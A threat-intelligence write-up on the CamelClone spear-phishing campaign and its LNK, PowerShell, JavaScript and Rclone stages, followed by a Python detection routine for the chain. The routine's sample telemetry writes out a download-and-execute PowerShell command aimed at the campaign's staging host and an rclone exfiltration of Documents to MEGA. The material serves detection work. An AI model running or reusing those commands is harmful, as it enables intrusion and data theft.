A recent cyber espionage operation, known as CamelClone, has been identified as a significant threat to government entities, defense sectors, and diplomatic missions in various countries, including Algeria, Mongolia, Ukraine, and Kuwait. This campaign employs spear-phishing tactics, leveraging ZIP files masquerading as official documents to initiate a series of malicious activities culminating in data theft via a legitimate cloud tool.
Operation Overview
The CamelClone operation came to light in late February 2026, when a suspicious ZIP file associated with Algeria’s Ministry of Housing was detected on VirusTotal. This file, uploaded from Algeria on February 24, marked the beginning of a series of targeted attacks. Subsequent files targeted Mongolia with themes around China cooperation, and further samples referenced Algerian-Ukrainian proposals and Kuwait’s Air Force, showcasing the operation’s broad geographical focus.
Strategic Targeting
Analysis by Seqrite highlights that despite the diverse targets, each country holds strategic importance in global geopolitics. Ukraine is entrenched in ongoing conflict, Algeria is pivotal in energy politics, Mongolia navigates complex relations with China and Russia, and Kuwait holds a key defense position in the Gulf. The attackers seem driven by intelligence gathering rather than financial gain.
Technical Execution
The attack methodology is consistent across all identified cases, utilizing ZIP archives containing LNK files with official-looking logos. When opened, a hidden PowerShell command activates, fetching subsequent attack stages from an anonymous file-sharing service. The absence of dedicated command servers, with all payloads hosted on filebulldogs[.]com and data routed through MEGA, complicates detection efforts.
Once initiated, the infection chain downloads and executes a JavaScript file, tracked as HOPPINGANT, which employs Base64-encoded PowerShell commands to further the attack. A decoy PDF distracts victims while a ZIP file with the Rclone tool is utilized to exfiltrate data, including sensitive documents and Telegram session information, to MEGA accounts linked to anonymous emails.
Defense Measures
Organizations in the government, defense, and diplomatic sectors should exercise caution with unsolicited ZIP files, particularly those referencing official matters. Blocking access to anonymous file-sharing services and monitoring outbound data transfers to cloud storage platforms can reduce risk exposure. Additionally, restricting the execution of LNK files from untrusted sources and using behavior-based security tools can stop the PowerShell and JavaScript stages of this chain before they fully execute.
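The infection chain described under Technical Execution and the behavior-based monitoring recommended above can be expressed as a small hunting routine over process-creation telemetry. The following is an added example, not code from the original report or from Seqrite: it models the chain's four observable stages (Explorer launching encoded PowerShell as an LNK is opened, PowerShell handing a .js file to a script host, the script host spawning further encoded PowerShell, and Rclone invoked against a MEGA remote) and decodes `-EncodedCommand` payloads so the staging host can be matched. The event records, field names, PIDs, file paths and the `encode_ps` helper are constructed test data modelled on Sysmon Event ID 1 fields, not real telemetry; the only indicator taken from the page is the `filebulldogs[.]com` host.

```python
"""Hunt for a CamelClone-style LNK -> PowerShell -> JS -> Rclone chain in
process-creation events.  Added example; events and field names are assumed
(modelled on Sysmon Event ID 1), not taken from the report."""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name, lower-case
    cmdline: str

# -e / -enc / -encodedcommand followed by a Base64 blob (PowerShell accepts any unambiguous prefix).
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Staging host named in the report; match both the defanged and the live spelling.
STAGING_HOST = re.compile(r"filebulldogs(?:\[\.\]|\.)com", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries Base64 of a UTF-16LE script.  Return the decoded
    script, or None when the flag is absent or the blob is not valid Base64/UTF-16."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def _flag(rule: str, ev: ProcEvent, why: str) -> dict:
    return {"rule": rule, "pid": ev.pid, "image": ev.image, "why": why}

def hunt(events: List[ProcEvent]) -> List[dict]:
    """Return one finding per matched stage; parent/child links come from ppid."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[dict] = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        pimg = parent.image if parent else ""
        if ev.image == "powershell.exe":
            script = decode_encoded_command(ev.cmdline)
            if script is None:
                continue                      # interactive or plain-text PowerShell: ignore here
            if pimg == "explorer.exe":
                findings.append(_flag("LNK_STAGE", ev, "encoded PowerShell launched from Explorer (LNK double-click pattern)"))
            if pimg in SCRIPT_HOSTS:
                findings.append(_flag("JS_STAGE", ev, "script host (.js stage) spawning encoded PowerShell"))
            if STAGING_HOST.search(script):
                findings.append(_flag("STAGING_HOST", ev, "decoded command references filebulldogs[.]com"))
        elif ev.image in SCRIPT_HOSTS and pimg == "powershell.exe" and re.search(r"\.js\b", ev.cmdline, re.IGNORECASE):
            findings.append(_flag("JS_DROP", ev, "PowerShell handing a .js file to a script host"))
        elif ev.image == "rclone.exe":
            if re.search(r"\bmega\b", ev.cmdline, re.IGNORECASE):
                findings.append(_flag("RCLONE_MEGA", ev, "Rclone invoked against a MEGA remote"))
            elif pimg == "powershell.exe" or pimg in SCRIPT_HOSTS:
                findings.append(_flag("RCLONE_SCRIPTED", ev, "Rclone spawned by a script interpreter"))
    return findings

def encode_ps(script: str) -> str:
    """Mirror PowerShell's -EncodedCommand encoding, used only to build test data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample telemetry: one full chain plus benign noise (an admin shell and a local backup).
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(1100, 1000, "powershell.exe", "powershell.exe -w hidden -enc " + encode_ps(
        "Invoke-WebRequest https://filebulldogs[.]com/PLACEHOLDER -OutFile $env:TEMP\\stage.js; wscript $env:TEMP\\stage.js")),
    ProcEvent(1200, 1100, "wscript.exe", "wscript C:\\Users\\victim\\AppData\\Local\\Temp\\stage.js"),
    ProcEvent(1300, 1200, "powershell.exe", "powershell.exe -nop -w hidden -enc " + encode_ps(
        "Start-Process decoy.pdf; Expand-Archive tools.zip")),
    ProcEvent(1400, 1300, "rclone.exe", "rclone.exe copy C:\\Users\\victim\\Documents mega:inbox --config C:\\Users\\victim\\AppData\\Local\\Temp\\rclone.conf"),
    ProcEvent(2000, 1000, "powershell.exe", "powershell.exe -NoProfile"),
    ProcEvent(2100, 1, "rclone.exe", "rclone.exe sync C:\\data D:\\backup"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['rule']}] pid={f['pid']} {f['image']}: {f['why']}")
```

Against the sample events the routine raises five findings on the malicious chain (PIDs 1100 through 1400) and none on the two benign processes. In production the same rules would be fed from Sysmon or EDR process events and combined with the network-side controls above (blocking the anonymous file-sharing host and alerting on Rclone or other bulk transfers to MEGA).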
